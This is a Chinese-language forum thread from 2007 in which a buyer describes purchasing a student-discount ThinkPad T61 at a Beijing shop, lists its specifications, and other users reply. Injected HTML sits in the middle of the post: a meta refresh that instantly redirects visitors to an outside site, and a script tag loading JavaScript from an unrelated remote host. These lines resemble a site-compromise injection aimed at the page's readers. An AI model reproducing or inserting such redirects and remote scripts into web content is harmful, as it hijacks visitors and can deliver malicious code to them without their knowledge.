开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 8月11日翔意购机日记,申请加精啊

这两天一直在关注学生机,没有想到学生机一下子这么快就到了,于是购买机器的工作一下子紧张起来,其他的,俺就不奢望了,但是发贴优惠的100总是要得到的吧。帐号是早早就注册好了,200个帖子要发够,于是昨天和今天一直在悄悄地发点小水,比起坛子里的其他人,俺这里是小巫了,好在这个任务不算难,顺利完成了。

周六下午,打电话问好俺属意的学生机已经到了,于是2点左右从家里出发,天气很热,太阳很大,好在还有点风。坐地铁到朝阳门,出了A口,左看右看,找不到天辰大厦,这时候,烈日炎炎,只好想路边的看车老大爷打听。什么?还有一段路,gogogo,以俺走路象小跑的速度,大约10分钟,就到了。

翔意在天辰大厦的1204,这个大厦像是新开发的,或许也是周六的缘故,基本上没有什么人,大堂空荡荡的,门口的保安也是百无聊赖,楼里还弥漫着一股装修的味道,整个看起来很新地说。电梯里也没有人,不知道平时是不是也人很多,这个只有翔意的mm们才知道了。

看起来我到的有点早,1204室还是有些空空荡荡的,只有一对小夫妻在试机,他们两口子比较厉害,一个买这次学生机的15寸宽屏(ThinkPad T61 6457),一个买小白,俺就不知道什么型号了。翔意的ddmm在一边帮忙。

本来到翔意,就是打算买这个15寸宽屏(ThinkPad T61 6457)的,性价比很高,12900元买到了比T60 A44宽屏还好很多的配置,比14寸宽屏不过贵上600元,不过一看到真机,我的心一下子动摇了,这个机器太完美了,太细腻了,但是也太大了,完全超出了我对笔记本的想象,想想我每天背着这样的笔记本跑来跑去,完全不象我一个公司小白的样子哦,再想想每次拿出这个笔记本来给别人看见,那种威武豪壮,一定是很震撼的样子。

俺决定退缩了,还是看看那个14寸宽屏吧,和翔意的mm说说,差点晕我一跳,没有?这时候俺都不知道该怎么办了,是空着手回去,这不符合俺的风格啊,还是搞定这个15寸的?犹豫啊犹豫。这时候有一个天籁之声传出来,谁说没有,那个那个AQ2就是啊。

啊,啊,于是在俺的眼前出来了一个小小的箱子,小小的箱子里面拿出来了一个“相对”秀气的本本,这时候,俺的眼睛放光、心跳加速,就是她了。

说起来在翔意看机器,其实很简单,或者信任是最重要的测试,对机器也没有做什么测试,机器是英文vista home P版,在系统里面看看配置,发现了好几个翔意配置上的错误,不过对我来说,无所谓的(正确的配置见后),再看看有没有坏点,哈哈,心里贼贼地想,要是这个机器没点,俺就要了,要是有点的话,俺就加100要求保点,真是心底黑暗啊,真好,仔细看了n次,直到眼花,还是没点。这个机器真是有保障的。

和翔意mm说,就它了,等俺去取钱。附近的银行的确比较多,我至少看到了4、5家,工行、交行、建行、中行等等,不过还是要等上近一个小时,才回到翔意。

交钱,套餐选了一个贴膜,mm贴起来真快。这个膜贴上之后,有点镜面屏的感觉了,不过说实话,俺不知道贴膜是不是好,反光地说。

mm问我装什么系统,刚才vista的启动实在是太慢了,俺说不用了,回家自己搞,先试试看vista的效果吧,这样一个系统,总是要尝尝鲜。于是mm给了一张XP的系统和驱动盘,俺就准备打道回府了。

慢着,要电脑包呢,看看那个电脑盒子,想一想,电脑等值钱的东西归我,电脑纸盒等不值钱的东西归翔意。背上崭新的电脑包,包里有崭新的电脑,俺就晃晃悠悠地出门了。

这时候,4点半,如果不算上取钱的时间,其实一个小时,怎么都搞定了。

到家,就试用vista,可能俺这个人没有美感,又不太适应新东西,把vista的玻璃效果和3D效果调出来,照上几张片子,想,真是不过如此。于是准备格机重装了。照片还在俺的PDA里面,等这个笔记本装好了,俺再传,估计效果,就是看看而已。

附:这个机器的正确的配置应该是
ThinkPad T61 7663 AQ2
T7300(2.0GHz)
2×1GB RAM
120GB 5400rpm HD
14.1in 1440x900 LCD
128MB nVIDIA Quadro NVS 140M
DVD CD-RW(到底是DVDRW还是CDRW我没有试,光驱上写着DVD CD-RW)
802.11ag wireless(系统中,标明好像不是agn,是ag)
蓝牙
摄像头
读卡器
Modem
1Gb Ethernet
UltraNav
1GB TURBO MEMORY
这个讯盘,俺在系统中没有找到,但是在vista的讯盘管理中找到了。
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 300

呵呵  第一批学生机的人  恭喜+羡慕~

上点图片吧!!!
恭喜LZ啊,写的很详细幽默,好久没看这类日记了~
图片呢.楼主这不是馋大家嘛.赶紧上图,上图才是王道.
支持阿,楼主很细心,把准确的配置报出来了,感谢
恭喜楼主抱的小黑回家
原帖由 bigcoolfish 于 2007-8-12 10:36 发表
802.11ag wireless(系统中,标明好像不是agn,是ag)

晕,难道xy配置写错了?
重装XP系统中,我习惯于安装、调优、做GHOST,还要把以前的数据倒过来,好慢啊,估计要晚上了。
稍候、稍候
这两天买学生机的人很多阿!呵呵~~!
好羡慕啊``学生机==口水机``
楼主真幸福,我订的学生机还没到货呢,不知道何时能到货
这么快学生机已经到手拉?!羡慕啊
恭喜加入黑社会~~~哈哈
真跟日记是的....保安也不放过.呵呵.恭喜
呵呵,恭喜啊!期待进一步的感受.
早知道我也去了,说不定还能跟楼主碰上,呵呵。只好再等等了。
这个不错~呵呵          
恭喜啊 呵呵 我们要努力了··
原帖由 ak7201543 于 2007-8-12 15:57 发表

晕,难道xy配置写错了?

是的啊~我今天买的,是4965AG~~~

心得过两天写哦,不过高分辨率的字真的小啊。。看的有点晕
高分屏习惯了就好,无线网卡现在都是ABG的,N的学生机肯定没有
楼猪就是撞到2G内存的那个幸运儿?
good,good!

time to go!
好好享受吧~~~~~~~~~~~~~~~~
怎么没有照片哪,很想看看!!!
谁买上学生机了,上来报个到啊